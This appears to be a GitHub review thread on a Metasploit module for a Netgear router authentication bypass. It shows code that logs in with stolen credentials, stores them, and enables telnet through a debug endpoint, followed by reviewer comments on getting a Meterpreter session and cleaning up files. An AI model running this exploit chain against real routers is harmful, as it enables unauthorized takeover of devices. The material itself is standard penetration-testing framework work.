modules/auxiliary/admin/http/netgear_pnpx_getsharefolderlist_auth_bypass.rb

```diff
@@ -0,0 +1,269 @@
+
+    print_status('Sending one request to grab authorization cookie from headers...')
+    cookie_jar.clear
+    res = send_request_cgi(
+      'uri' => '/top.html',
+      'method' => 'GET',
+      'keep_cookies' => 'true'
+    )
+
+    if res.nil?
+      fail_with(Failure::Unreachable, 'Could not reach the target, something may have happened mid attempt!')
+    end
+
+    if cookie_jar.empty?
+      fail_with(Failure::UnexpectedReply, "Router didn't respond with the expected Set-Cookie header to a response to /top.html!")
+    end
+
+    print_status('Got the authentication cookie, associating it with a logged in session...')
+    res = send_request_cgi(
+      'uri' => '/top.html',
+      'method' => 'GET',
+      'authorization' => basic_auth(username, password)
+    )
+
+    if res.nil?
+      fail_with(Failure::Unreachable, 'Could not reach the target, something may have happened mid attempt!')
+    end
+
+    result = res.get_html_document
+    unless result.xpath("//div[@id='firm_version']/text()") # Find all div tags with an "id" attribute named "firm_version" and find its text value.
+      fail_with(Failure::UnexpectedReply, 'The target router did not respond with a firmware version when /top.html was requested. Are we logged in?')
+    end
+
+    print_good('Successfully logged into target router using the stolen credentials!')
+    print_status('Attempting to store credentials for future use...')
+
+    # Create HTTP Login Data
+    service_data = {
+      address: datastore['RHOST'],
+      port: datastore['RPORT'],
+      service_name: 'http',
+      protocol: 'tcp',
+      workspace_id: myworkspace_id
+    }
+
+    credential_data = {
+      module_fullname: fullname,
+      origin_type: :service,
+      private_data: password,
+      private_type: :password,
+      username: username
+    }
+
+    credential_data.merge!(service_data)
+
+    credential_core = create_credential(credential_data)
+
+    login_data = {
+      core: credential_core,
+      last_attempted_at: DateTime.now,
+      status: Metasploit::Model::Login::Status::SUCCESSFUL
+    }.merge(service_data)
+
+    create_credential_login(login_data)
+
+    print_status('Enabling telnet on the target router...')
+    res = send_request_cgi(
+      'uri' => '/setup.cgi',
+      'method' => 'GET',
+      'vars_get' => {
+        'todo' => 'debug'
+      },
+      'authorization' => basic_auth(username, password)
+    )
+
+    if res.nil?
+      fail_with(Failure::Unreachable, 'Could not reach the target, something may have happened mid attempt!')
+    end
+
+    unless /Debug Enable!/.match(res&.body) # Since this is a one liner response, we don't use XPath searches here and instead resort to a plain regex match.
+      fail_with(Failure::UnexpectedReply, 'Target did not enable debug mode for some reason!')
+    end
+    print_good('Telnet enabled on target router!')
+    handler = framework.modules.create('auxiliary/scanner/telnet/telnet_login')
```

Comment:
Writing credentials to a file to use this auxiliary scanner module doesn't sounds right to me. Would it be possible to directly implement the Telnet logic here without calling an external module? For example using `Auxiliary::CommandShell`? Or better, using the `cmdstager` to get a Meterpreter session?

Reply:
I tried but unfortunately not. Also this method was recommended by @smcintyre-r7 so I'm going off his advice here, but I agree it would be nicer to have it built into this module, just wasn't able to get it to work without erroring out.

Reply:
No worry, that's fine. Just one last suggestion, would it be possible to cleanup this file once the session is setup?

Reply:
Hmm good point, yeah I was thinking of doing that it just skipped my mind whilst I was trying to get things working. I'll add in the cleanup code so long :)

Reply:
Fixed in https://github.com/rapid7/metasploit-framework/pull/15677/commits/6ed3462517e030138701a56dfd0c8480c6bbab1c